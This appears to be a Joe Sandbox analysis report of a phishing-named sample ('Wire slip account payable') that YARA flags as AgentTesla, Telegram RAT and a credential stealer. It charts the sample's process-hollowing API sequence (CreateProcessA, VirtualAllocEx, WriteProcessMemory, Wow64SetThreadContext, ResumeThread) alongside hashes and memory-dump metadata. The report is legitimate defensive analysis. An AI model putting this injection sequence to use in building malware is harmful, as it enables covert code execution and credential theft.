                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  Reset < >

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:12.7%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:124
                                                                                                                    Total number of Limit Nodes:9
                                                                                                                    execution_graph 24286 749c118 24287 749c13e 24286->24287 24288 749c2a3 24286->24288 24287->24288 24290 7494920 24287->24290 24291 749c398 PostMessageW 24290->24291 24292 749c404 24291->24292 24292->24287 24155 155ac10 24156 155ac1f 24155->24156 24159 155ad08 24155->24159 24164 155acf8 24155->24164 24160 155ad3c 24159->24160 24161 155ad19 24159->24161 24160->24156 24161->24160 24162 155af40 GetModuleHandleW 24161->24162 24163 155af6d 24162->24163 24163->24156 24165 155ad3c 24164->24165 24166 155ad19 24164->24166 24165->24156 24166->24165 24167 155af40 GetModuleHandleW 24166->24167 24168 155af6d 24167->24168 24168->24156 24293 155d5f0 DuplicateHandle 24294 155d686 24293->24294 24295 155cfa0 24296 155cfe6 GetCurrentProcess 24295->24296 24298 155d031 24296->24298 24299 155d038 GetCurrentThread 24296->24299 24298->24299 24300 155d075 GetCurrentProcess 24299->24300 24302 155d06e 24299->24302 24301 155d0ab 24300->24301 24303 155d0d3 GetCurrentThreadId 24301->24303 24302->24300 24304 155d104 24303->24304 24169 74984cf 24172 749aea8 24169->24172 24170 74984de 24173 749aec2 24172->24173 24180 749aee6 24173->24180 24185 749b4e2 24173->24185 24192 749b3ea 24173->24192 24197 749b7e9 24173->24197 24204 749b3d7 24173->24204 24209 749b254 24173->24209 24215 749b413 24173->24215 24219 749b65c 24173->24219 24226 749b507 24173->24226 24230 749b585 24173->24230 24234 749b5e5 24173->24234 24180->24170 24186 749b501 24185->24186 24187 749bafd 24186->24187 24238 7497a98 24186->24238 24242 7497aa0 24186->24242 24246 7497b48 24186->24246 24250 7497b50 24186->24250 24187->24180 24193 749b40d 24192->24193 24254 7497ce8 24193->24254 24258 7497ce0 24193->24258 24194 749bb59 24198 749b67a 24197->24198 24198->24197 24199 749bafd 24198->24199 24200 7497b48 Wow64SetThreadContext 24198->24200 24201 7497b50 Wow64SetThreadContext 24198->24201 24202 7497a98 ResumeThread 24198->24202 24203 7497aa0 ResumeThread 24198->24203 24199->24180 24200->24198 24201->24198 24202->24198 24203->24198 24205 749b3e4 24204->24205 24207 7497ce8 WriteProcessMemory 24205->24207 24208 7497ce0 WriteProcessMemory 24205->24208 24206 749b3bf 24206->24180 24207->24206 24208->24206 24210 749b257 24209->24210 24211 749b298 24210->24211 24262 7497f70 24210->24262 24266 7497f65 24210->24266 24211->24180 24217 7497ce8 WriteProcessMemory 24215->24217 24218 7497ce0 WriteProcessMemory 24215->24218 24216 749b437 24216->24180 24217->24216 24218->24216 24220 749b662 24219->24220 24221 749bafd 24220->24221 24222 7497b48 Wow64SetThreadContext 24220->24222 24223 7497b50 Wow64SetThreadContext 24220->24223 24224 7497a98 ResumeThread 24220->24224 24225 7497aa0 ResumeThread 24220->24225 24221->24180 24222->24220 24223->24220 24224->24220 24225->24220 24270 7497c28 24226->24270 24274 7497c20 24226->24274 24227 749b525 24227->24180 24278 7497dd8 24230->24278 24282 7497dd0 24230->24282 24231 749b3bf 24231->24180 24236 7497b48 Wow64SetThreadContext 24234->24236 24237 7497b50 Wow64SetThreadContext 24234->24237 24235 749b5ff 24235->24180 24236->24235 24237->24235 24239 7497aa0 ResumeThread 24238->24239 24241 7497b11 24239->24241 24241->24186 24243 7497ae0 ResumeThread 24242->24243 24245 7497b11 24243->24245 24245->24186 24247 7497b50 Wow64SetThreadContext 24246->24247 24249 7497bdd 24247->24249 24249->24186 24251 7497b95 Wow64SetThreadContext 24250->24251 24253 7497bdd 24251->24253 24253->24186 24255 7497d30 WriteProcessMemory 24254->24255 24257 7497d87 24255->24257 24257->24194 24259 7497ce8 WriteProcessMemory 24258->24259 24261 7497d87 24259->24261 24261->24194 24263 7497ff9 CreateProcessA 24262->24263 24265 74981bb 24263->24265 24267 7497f70 CreateProcessA 24266->24267 24269 74981bb 24267->24269 24271 7497c31 VirtualAllocEx 24270->24271 24273 7497ca5 24271->24273 24273->24227 24275 7497c26 VirtualAllocEx 24274->24275 24277 7497ca5 24275->24277 24277->24227 24279 7497e23 ReadProcessMemory 24278->24279 24281 7497e67 24279->24281 24281->24231 24283 7497dd8 ReadProcessMemory 24282->24283 24285 7497e67 24283->24285 24285->24231 24305 1554668 24306 1554672 24305->24306 24308 1554758 24305->24308 24309 155477d 24308->24309 24313 1554858 24309->24313 24317 1554868 24309->24317 24315 155488f 24313->24315 24314 155496c 24314->24314 24315->24314 24321 15544b0 24315->24321 24319 155488f 24317->24319 24318 155496c 24318->24318 24319->24318 24320 15544b0 CreateActCtxA 24319->24320 24320->24318 24322 15558f8 CreateActCtxA 24321->24322 24324 15559bb 24322->24324
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 050eb2d37d62136332ad29d22815ac10fcb9b191b2f58cb5628c7c47227f00fe
                                                                                                                    • Instruction ID: 94941471417cd293e80d6177bb9954a1c025520f813075f2fdbb1bcbd81ba8a2
                                                                                                                    • Opcode Fuzzy Hash: 050eb2d37d62136332ad29d22815ac10fcb9b191b2f58cb5628c7c47227f00fe
                                                                                                                    • Instruction Fuzzy Hash: 08E199B1B012069FDF29DB75C560BAFBBFAAF89200F14446AD5469B391DB34E801CB61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 37f76cac625b6dfb9a36fbfcfbed0e7944a90a8043fd4c44a0bf4c7021642e5c
                                                                                                                    • Instruction ID: 1d61205233434f8a5170f9f64c9e5c13b42d8216dd0c163d27854eaebb0bd1e1
                                                                                                                    • Opcode Fuzzy Hash: 37f76cac625b6dfb9a36fbfcfbed0e7944a90a8043fd4c44a0bf4c7021642e5c
                                                                                                                    • Instruction Fuzzy Hash: 72D017F4C2D244CFCB509F64A4586F9BABCDB47205F0924BB894EA7A02D1248501CA1A

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 294 155cf90-155d02f GetCurrentProcess 298 155d031-155d037 294->298 299 155d038-155d06c GetCurrentThread 294->299 298->299 300 155d075-155d0a9 GetCurrentProcess 299->300 301 155d06e-155d074 299->301 303 155d0b2-155d0cd call 155d578 300->303 304 155d0ab-155d0b1 300->304 301->300 306 155d0d3-155d102 GetCurrentThreadId 303->306 304->303 308 155d104-155d10a 306->308 309 155d10b-155d16d 306->309 308->309
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0155D01E
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0155D05B
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0155D098
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0155D0F1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1739210473.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1550000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2063062207-0
                                                                                                                    • Opcode ID: ff2a928b3e63c64abe8812d57c516de27a2956b5ad77173e9a65406d4a2d512d
                                                                                                                    • Instruction ID: 3d8b9e004fb2f29731f444e30ba17065a9380cfb38853ccc65386df9a86563d3
                                                                                                                    • Opcode Fuzzy Hash: ff2a928b3e63c64abe8812d57c516de27a2956b5ad77173e9a65406d4a2d512d
                                                                                                                    • Instruction Fuzzy Hash: D05175B19013498FDB54DFA9D548BDEBBF1BF48304F20889AD448AB260E7349885CF65

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 316 155cfa0-155d02f GetCurrentProcess 320 155d031-155d037 316->320 321 155d038-155d06c GetCurrentThread 316->321 320->321 322 155d075-155d0a9 GetCurrentProcess 321->322 323 155d06e-155d074 321->323 325 155d0b2-155d0cd call 155d578 322->325 326 155d0ab-155d0b1 322->326 323->322 328 155d0d3-155d102 GetCurrentThreadId 325->328 326->325 330 155d104-155d10a 328->330 331 155d10b-155d16d 328->331 330->331
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0155D01E
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0155D05B
                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0155D098
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0155D0F1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1739210473.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1550000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2063062207-0
                                                                                                                    • Opcode ID: baa3b186ba999f2935eebc77ebbb7ac070f6cd89c7c902fc7591a1e1f0dd73fc
                                                                                                                    • Instruction ID: d0f5055fb2538e7361061b19df32c527ff7f9866a4e7b1d198d39cfeb0621225
                                                                                                                    • Opcode Fuzzy Hash: baa3b186ba999f2935eebc77ebbb7ac070f6cd89c7c902fc7591a1e1f0dd73fc
                                                                                                                    • Instruction Fuzzy Hash: E25165B19013098FDB54DFA9C548BDEBBF1BF88314F208859E408AB260E734A885CF65

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 360 7497f65-7498005 363 749803e-749805e 360->363 364 7498007-7498011 360->364 371 7498060-749806a 363->371 372 7498097-74980c6 363->372 364->363 365 7498013-7498015 364->365 366 7498038-749803b 365->366 367 7498017-7498021 365->367 366->363 369 7498023 367->369 370 7498025-7498034 367->370 369->370 370->370 373 7498036 370->373 371->372 374 749806c-749806e 371->374 378 74980c8-74980d2 372->378 379 74980ff-74981b9 CreateProcessA 372->379 373->366 376 7498091-7498094 374->376 377 7498070-749807a 374->377 376->372 380 749807c 377->380 381 749807e-749808d 377->381 378->379 382 74980d4-74980d6 378->382 392 74981bb-74981c1 379->392 393 74981c2-7498248 379->393 380->381 381->381 383 749808f 381->383 384 74980f9-74980fc 382->384 385 74980d8-74980e2 382->385 383->376 384->379 387 74980e4 385->387 388 74980e6-74980f5 385->388 387->388 388->388 389 74980f7 388->389 389->384 392->393 403 7498258-749825c 393->403 404 749824a-749824e 393->404 406 749826c-7498270 403->406 407 749825e-7498262 403->407 404->403 405 7498250 404->405 405->403 409 7498280-7498284 406->409 410 7498272-7498276 406->410 407->406 408 7498264 407->408 408->406 411 7498296-749829d 409->411 412 7498286-749828c 409->412 410->409 413 7498278 410->413 414 749829f-74982ae 411->414 415 74982b4 411->415 412->411 413->409 414->415 417 74982b5 415->417 417->417
                                                                                                                    APIs
                                                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 074981A6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 963392458-0
                                                                                                                    • Opcode ID: c999ac46ff7f1b35d11c800ac81e458de698624bcd909ecb7d4153c16ea21347
                                                                                                                    • Instruction ID: 4addd57f7840714daf1ac77ff7987e2b33c08e39cb8515462c9baa52ca71d2e5
                                                                                                                    • Opcode Fuzzy Hash: c999ac46ff7f1b35d11c800ac81e458de698624bcd909ecb7d4153c16ea21347
                                                                                                                    • Instruction Fuzzy Hash: 76A15AB1D0061ADFDF10CFA8C8417EEBBB6BF45314F1485AAE848A7240DB759985CF92

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 418 7497f70-7498005 420 749803e-749805e 418->420 421 7498007-7498011 418->421 428 7498060-749806a 420->428 429 7498097-74980c6 420->429 421->420 422 7498013-7498015 421->422 423 7498038-749803b 422->423 424 7498017-7498021 422->424 423->420 426 7498023 424->426 427 7498025-7498034 424->427 426->427 427->427 430 7498036 427->430 428->429 431 749806c-749806e 428->431 435 74980c8-74980d2 429->435 436 74980ff-74981b9 CreateProcessA 429->436 430->423 433 7498091-7498094 431->433 434 7498070-749807a 431->434 433->429 437 749807c 434->437 438 749807e-749808d 434->438 435->436 439 74980d4-74980d6 435->439 449 74981bb-74981c1 436->449 450 74981c2-7498248 436->450 437->438 438->438 440 749808f 438->440 441 74980f9-74980fc 439->441 442 74980d8-74980e2 439->442 440->433 441->436 444 74980e4 442->444 445 74980e6-74980f5 442->445 444->445 445->445 446 74980f7 445->446 446->441 449->450 460 7498258-749825c 450->460 461 749824a-749824e 450->461 463 749826c-7498270 460->463 464 749825e-7498262 460->464 461->460 462 7498250 461->462 462->460 466 7498280-7498284 463->466 467 7498272-7498276 463->467 464->463 465 7498264 464->465 465->463 468 7498296-749829d 466->468 469 7498286-749828c 466->469 467->466 470 7498278 467->470 471 749829f-74982ae 468->471 472 74982b4 468->472 469->468 470->466 471->472 474 74982b5 472->474 474->474
                                                                                                                    APIs
                                                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 074981A6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 963392458-0
                                                                                                                    • Opcode ID: 6934cfd7bc141ccb3723b27bc55dd537c50c8b811f854b51a3da3cc2a0e61ac5
                                                                                                                    • Instruction ID: c6beee57fb39f692fb60b904037e8aca524622114878b93fa00f1bc0ef0aae6c
                                                                                                                    • Opcode Fuzzy Hash: 6934cfd7bc141ccb3723b27bc55dd537c50c8b811f854b51a3da3cc2a0e61ac5
                                                                                                                    • Instruction Fuzzy Hash: 7B9159B1D0061ADFDF10CFA8C8407EEBBB6BF45314F1485AAE848A7240DB759985CF92

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 475 155ad08-155ad17 476 155ad43-155ad47 475->476 477 155ad19-155ad26 call 155a02c 475->477 479 155ad49-155ad53 476->479 480 155ad5b-155ad9c 476->480 482 155ad3c 477->482 483 155ad28 477->483 479->480 486 155ad9e-155ada6 480->486 487 155ada9-155adb7 480->487 482->476 530 155ad2e call 155af90 483->530 531 155ad2e call 155afa0 483->531 486->487 488 155adb9-155adbe 487->488 489 155addb-155addd 487->489 491 155adc0-155adc7 call 155a038 488->491 492 155adc9 488->492 494 155ade0-155ade7 489->494 490 155ad34-155ad36 490->482 493 155ae78-155af38 490->493 496 155adcb-155add9 491->496 492->496 525 155af40-155af6b GetModuleHandleW 493->525 526 155af3a-155af3d 493->526 497 155adf4-155adfb 494->497 498 155ade9-155adf1 494->498 496->494 500 155adfd-155ae05 497->500 501 155ae08-155ae11 call 155a048 497->501 498->497 500->501 506 155ae13-155ae1b 501->506 507 155ae1e-155ae23 501->507 506->507 508 155ae25-155ae2c 507->508 509 155ae41-155ae45 507->509 508->509 511 155ae2e-155ae3e call 155a058 call 155a068 508->511 532 155ae48 call 155b290 509->532 533 155ae48 call 155b2a0 509->533 511->509 514 155ae4b-155ae4e 516 155ae71-155ae77 514->516 517 155ae50-155ae6e 514->517 517->516 527 155af74-155af88 525->527 528 155af6d-155af73 525->528 526->525 528->527 530->490 531->490 532->514 533->514
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0155AF5E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1739210473.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1550000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4139908857-0
                                                                                                                    • Opcode ID: a8a4d8711b2294f16fbb30df1d71f06be6c8ea6f8e0f0effb724697df33bad0c
                                                                                                                    • Instruction ID: 4a547a13e8c4d6054c92a6fa3e81ca678d6ac82fd5c6f60795d05d3a75ead540
                                                                                                                    • Opcode Fuzzy Hash: a8a4d8711b2294f16fbb30df1d71f06be6c8ea6f8e0f0effb724697df33bad0c
                                                                                                                    • Instruction Fuzzy Hash: A1713570A00B058FD764DF29D06479ABBF5FF88304F108A2ED89ADBA50D774E949CB91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 534 15544b0-15559b9 CreateActCtxA 537 15559c2-1555a1c 534->537 538 15559bb-15559c1 534->538 545 1555a1e-1555a21 537->545 546 1555a2b-1555a2f 537->546 538->537 545->546 547 1555a31-1555a3d 546->547 548 1555a40 546->548 547->548 550 1555a41 548->550 550->550
                                                                                                                    APIs
                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 015559A9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1739210473.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1550000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Create
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2289755597-0
                                                                                                                    • Opcode ID: f331a7c7b57eabf7e96ead5fe8cfd62e7032fd44b83e80eebc5bf7914e05c694
                                                                                                                    • Instruction ID: e55c41e26fcd8dcdca1d57cc02ff8c336923a374cc1436571397394a01e2dc15
                                                                                                                    • Opcode Fuzzy Hash: f331a7c7b57eabf7e96ead5fe8cfd62e7032fd44b83e80eebc5bf7914e05c694
                                                                                                                    • Instruction Fuzzy Hash: 9A41E1B0C1071DCBDB24DFA9C8447DEBBB5BF49304F2084AAD408AB251EBB56945CF90

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 551 15558ec-15558f3 552 15558fc-15559b9 CreateActCtxA 551->552 554 15559c2-1555a1c 552->554 555 15559bb-15559c1 552->555 562 1555a1e-1555a21 554->562 563 1555a2b-1555a2f 554->563 555->554 562->563 564 1555a31-1555a3d 563->564 565 1555a40 563->565 564->565 567 1555a41 565->567 567->567
                                                                                                                    APIs
                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 015559A9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1739210473.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1550000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Create
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2289755597-0
                                                                                                                    • Opcode ID: 66b3bceaae015b285b040d9833206bc9943e69651c5170de5391e1ffd1d463df
                                                                                                                    • Instruction ID: a0df0f1dcb303273fadcaa4c1457ba07bb84ddcac653e01ff4eb7e45a625f277
                                                                                                                    • Opcode Fuzzy Hash: 66b3bceaae015b285b040d9833206bc9943e69651c5170de5391e1ffd1d463df
                                                                                                                    • Instruction Fuzzy Hash: 4241EFB0C00719CADB24DFAAC8847DDBBB5BF48304F24809AD808AB251EBB56945CF90

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 568 7497ce0-7497d36 571 7497d38-7497d44 568->571 572 7497d46-7497d85 WriteProcessMemory 568->572 571->572 574 7497d8e-7497dbe 572->574 575 7497d87-7497d8d 572->575 575->574
                                                                                                                    APIs
                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07497D78
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3559483778-0
                                                                                                                    • Opcode ID: 1c6ea4da0e945def99bc0d1ae846488533ab325236581bb3ee5a94b74f291a74
                                                                                                                    • Instruction ID: 71891633ea5ad4371699fc035cd98fb7027a5e8ba8d155fd913bbd42edabff89
                                                                                                                    • Opcode Fuzzy Hash: 1c6ea4da0e945def99bc0d1ae846488533ab325236581bb3ee5a94b74f291a74
                                                                                                                    • Instruction Fuzzy Hash: 4D2155B19003599FCF10CFA9C881BEEBBF0FF48324F10842AE958A7240C7789944CBA0

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 590 7497ce8-7497d36 592 7497d38-7497d44 590->592 593 7497d46-7497d85 WriteProcessMemory 590->593 592->593 595 7497d8e-7497dbe 593->595 596 7497d87-7497d8d 593->596 596->595
                                                                                                                    APIs
                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07497D78
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3559483778-0
                                                                                                                    • Opcode ID: 4b2707b5e8a63fb035d7bbcf09649b01e33ee8ed99127c0721f145ac8e46f8f1
                                                                                                                    • Instruction ID: e55a660a191d88dfa5555bcc9f2a2e48e31b9d7053f3525dbcd729d1f98a420d
                                                                                                                    • Opcode Fuzzy Hash: 4b2707b5e8a63fb035d7bbcf09649b01e33ee8ed99127c0721f145ac8e46f8f1
                                                                                                                    • Instruction Fuzzy Hash: B12126B19003599FCF10CFA9C985BEEBBF5FF48314F10842AE959A7250D7789944CBA4

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 579 7497b48-7497b9b 582 7497bab-7497bdb Wow64SetThreadContext 579->582 583 7497b9d-7497ba9 579->583 585 7497bdd-7497be3 582->585 586 7497be4-7497c14 582->586 583->582 585->586
                                                                                                                    APIs
                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07497BCE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 983334009-0
                                                                                                                    • Opcode ID: 5803c7bbe1dc452cc1c6e8d44de24bbac3f4bd6f01ba7ada5cb1c6d7b1b46674
                                                                                                                    • Instruction ID: 8f0ef8f34de54d0a130c6bf233ff6c4297b5d2fef0e5f50b0d5c859298c42f98
                                                                                                                    • Opcode Fuzzy Hash: 5803c7bbe1dc452cc1c6e8d44de24bbac3f4bd6f01ba7ada5cb1c6d7b1b46674
                                                                                                                    • Instruction Fuzzy Hash: 0E215CB19003098FDB10DFAAC4857EEBFF4EF88324F14842AD459A7240C7789585CFA5

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 600 7497dd0-7497e65 ReadProcessMemory 604 7497e6e-7497e9e 600->604 605 7497e67-7497e6d 600->605 605->604
                                                                                                                    APIs
                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07497E58
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MemoryProcessRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1726664587-0
                                                                                                                    • Opcode ID: f64c76d19af176e05a2c26c37d73be7cb4a5361d5a2720be4822fddedf4ecbff
                                                                                                                    • Instruction ID: 1a5403a3038695b3f9dba2e3458052a4694cfc50b82367e670ec3d9896469ec0
                                                                                                                    • Opcode Fuzzy Hash: f64c76d19af176e05a2c26c37d73be7cb4a5361d5a2720be4822fddedf4ecbff
                                                                                                                    • Instruction Fuzzy Hash: D72139B18002599FCF10CFA9C881AEEFBF5FF48320F10842AE558A7250C7349945CBA4

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 619 7497dd8-7497e65 ReadProcessMemory 622 7497e6e-7497e9e 619->622 623 7497e67-7497e6d 619->623 623->622
                                                                                                                    APIs
                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07497E58
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MemoryProcessRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1726664587-0
                                                                                                                    • Opcode ID: d983af5100510c3d94c2ab337421f1bb0928e46b81c097ac38e97ad371dcddca
                                                                                                                    • Instruction ID: 3f0d5fbb002c4e858ba5ce6c14f627c2c4dbff536b9c83078fa99eca65b37465
                                                                                                                    • Opcode Fuzzy Hash: d983af5100510c3d94c2ab337421f1bb0928e46b81c097ac38e97ad371dcddca
                                                                                                                    • Instruction Fuzzy Hash: 502128B18003599FCF10DFAAC885AEEFBF5FF48320F10842AE558A7250C7349944CBA4

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 609 7497b50-7497b9b 611 7497bab-7497bdb Wow64SetThreadContext 609->611 612 7497b9d-7497ba9 609->612 614 7497bdd-7497be3 611->614 615 7497be4-7497c14 611->615 612->611 614->615
                                                                                                                    APIs
                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07497BCE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1746001725.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7490000_Wire slip account payable.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 983334009-0
